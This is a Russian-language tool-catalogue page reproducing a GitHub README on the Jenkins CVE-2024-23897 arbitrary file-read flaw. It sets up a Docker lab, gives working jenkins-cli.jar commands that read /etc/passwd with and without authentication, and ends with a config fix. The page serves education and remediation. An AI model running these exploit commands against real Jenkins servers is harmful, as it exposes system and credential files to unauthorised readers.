Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — в этом git вы можете найти всю информацию о CVE-2024-23897 | Kitploit
Инструменты/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

в этом git вы можете найти всю информацию о CVE-2024-23897

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
422 лет назадЕщё не проверено

PoC-jenkins-rce_CVE-2024-23897.

В этом git-репозитории вы найдете всю информацию о CVE-2024-23897.

logo-jenkins

Введение

Проблеме, которой присвоен идентификатор CVE-2024-23897, описана как уязвимость произвольного чтения файлов через встроенный интерфейс командной строки. Этот парсер команд имеет функцию, которая заменяет символ @, за которым следует путь к файлу в аргументе, содержимым файла (expandAtFiles). Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних, она не отключается.

PoC

Для данного PoC я установил Jenkins 2.426.2 с помощью Docker, чтобы проверить эксплуатацию уязвимости.

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

После создания пользователя и пароля я загрузил клиент Jenkins CLI (jenkins-cli.jar) на свою атакующую машину.

screen1

Затем я написал команду для эксплуатации. В этой команде нам нужны учетные данные пользователя Jenkins.

root@kitploit:~
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
screen2

Другая команда позволяет отобразить первые строки файла без аутентификации.

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
screen3

Исправление уязвимости

Чтобы устранить эту уязвимость, необходимо перейти к конфигурационному файлу Jenkins с именем config.xml (в моем случае он находится в моем Docker-контейнере, поэтому я переключаюсь в режим оболочки в своем контейнере).

screen4
и добавить строку:
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

и перезапустить Jenkins:

root@kitploit:~
service jenkins restart
Скачать инструмент